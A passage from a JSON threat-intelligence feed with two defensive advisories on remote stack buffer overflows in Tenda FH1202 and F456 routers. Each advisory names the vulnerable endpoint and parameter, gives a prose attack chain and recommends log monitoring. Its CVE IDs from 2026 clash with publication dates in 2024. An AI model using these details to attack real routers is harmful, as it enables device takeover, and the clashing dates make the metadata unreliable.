1.2.0.14(408)"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7034","buffer-overflow","router","tenda"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability, identified as CVE-2026-7034, has been discovered in Tenda FH1202 version 1.2.0.14(408). The vulnerability resides within the \u003ccode\u003eWrlExtraSet\u003c/code\u003e function of the \u003ccode\u003e/goform/WrlExtraSet\u003c/code\u003e component, which is part of the device\u0026rsquo;s \u003ccode\u003ehttpd\u003c/code\u003e server. A remote attacker can exploit this vulnerability by crafting a malicious HTTP request that manipulates the \u003ccode\u003eGo\u003c/code\u003e argument, leading to arbitrary code execution on the affected device. The exploit for this vulnerability has been made public, increasing the risk of widespread exploitation. This vulnerability poses a significant threat to users of the Tenda FH1202 router as it allows for complete compromise of the device.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Tenda FH1202 router exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/WrlExtraSet\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a \u003ccode\u003eGo\u003c/code\u003e parameter with a payload exceeding the expected buffer size, triggering the stack-based buffer overflow.\u003c/li\u003e\n\u003cli\u003eThe overflow overwrites critical return addresses on the stack.\u003c/li\u003e\n\u003cli\u003eThe overwritten return address is redirected to malicious code injected by the attacker within the overflowed buffer.\u003c/li\u003e\n\u003cli\u003eThe injected code executes with the privileges of the \u003ccode\u003ehttpd\u003c/code\u003e process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains complete control of the device, potentially allowing for the installation of malware, modification of router settings, or interception of network traffic.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to gain complete control of the Tenda FH1202 router. This can lead to a variety of malicious activities, including installing persistent backdoors, modifying DNS settings to redirect traffic, or using the compromised device as part of a botnet. The lack of required authentication for exploitation increases the severity, making it easily exploitable. While the exact number of affected devices is unknown, the widespread use of Tenda routers suggests a potentially large number of vulnerable targets.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/WrlExtraSet\u003c/code\u003e with unusually long \u003ccode\u003eGo\u003c/code\u003e parameter values to detect potential exploitation attempts. Reference the Sigma rule \u003ccode\u003eDetect Suspicious WrlExtraSet Requests\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting for requests to the \u003ccode\u003e/goform/WrlExtraSet\u003c/code\u003e endpoint to mitigate brute-force exploitation attempts.\u003c/li\u003e\n\u003cli\u003eConsider blocking or alerting on requests to \u003ccode\u003e/goform/WrlExtraSet\u003c/code\u003e originating from outside the expected user base (e.g., requests originating from outside the country where the organization operates).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-tenda-fh1202-bo/","summary":"A stack-based buffer overflow vulnerability exists in the Tenda FH1202 router, specifically in the WrlExtraSet function, allowing remote attackers to execute arbitrary code by manipulating the 'Go' argument in a request to /goform/WrlExtraSet.","title":"Tenda FH1202 Stack-Based Buffer Overflow Vulnerability (CVE-2026-7034)","url":"https://feed.craftedsignal.io/briefs/2024-01-tenda-fh1202-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7098"}],"_cs_exploited":false,"_cs_products":["F456"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7098","buffer-overflow","router"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, identified as CVE-2026-7098, has been discovered in Tenda F456 router version 1.0.0.5. The vulnerability resides within the \u003ccode\u003efromDhcpListClient\u003c/code\u003e function of the \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e component\u0026rsquo;s \u003ccode\u003ehttpd\u003c/code\u003e service. An attacker can exploit this flaw by remotely manipulating the \u003ccode\u003epage\u003c/code\u003e argument, leading to a buffer overflow. Publicly available exploit code exists, increasing the risk of widespread exploitation. Successful exploitation could allow an attacker to execute arbitrary code on the device, potentially gaining full control of the router and the network it serves. This poses a significant threat to home and small business users relying on these routers.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Tenda F456 router (version 1.0.0.5) accessible over the network.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a \u003ccode\u003epage\u003c/code\u003e argument with a payload designed to overflow the buffer in the \u003ccode\u003efromDhcpListClient\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehttpd\u003c/code\u003e service processes the request and calls the \u003ccode\u003efromDhcpListClient\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eDue to insufficient bounds checking, the oversized payload overwrites the buffer, potentially overwriting adjacent memory regions.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s payload overwrites the return address on the stack with a pointer to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromDhcpListClient\u003c/code\u003e function returns, causing execution to jump to the attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe attacker-controlled code executes with the privileges of the \u003ccode\u003ehttpd\u003c/code\u003e service, potentially allowing for full control of the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can allow a remote attacker to execute arbitrary code on the Tenda F456 router. This could lead to a complete compromise of the device, allowing the attacker to modify router settings, intercept network traffic, or use the router as a pivot point for further attacks within the network. Given the ease of exploitation and public availability of exploit code, a large number of Tenda F456 users are at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests to \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e with unusually long \u003ccode\u003epage\u003c/code\u003e parameters to detect potential exploitation attempts (see Sigma rule \u0026ldquo;Detect Tenda F456 Buffer Overflow Attempt\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on requests to the \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e endpoint to mitigate the impact of potential attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Tenda F456 Buffer Overflow Response\u0026rdquo; to identify successful exploitation attempts based on server response codes.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-tenda-f456-buffer-overflow/","summary":"A remote buffer overflow vulnerability exists in Tenda F456 version 1.0.0.5 via manipulation of the 'page' argument in the fromDhcpListClient function of the /goform/DhcpListClient component, potentially leading to arbitrary code execution.","title":"Tenda F456 Remote Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-tenda-f456-buffer-overflow/"}],"language":"en","title":"CraftedSignal Threat Feed — Router","version":"https://jsonfeed.org/version/1.1"}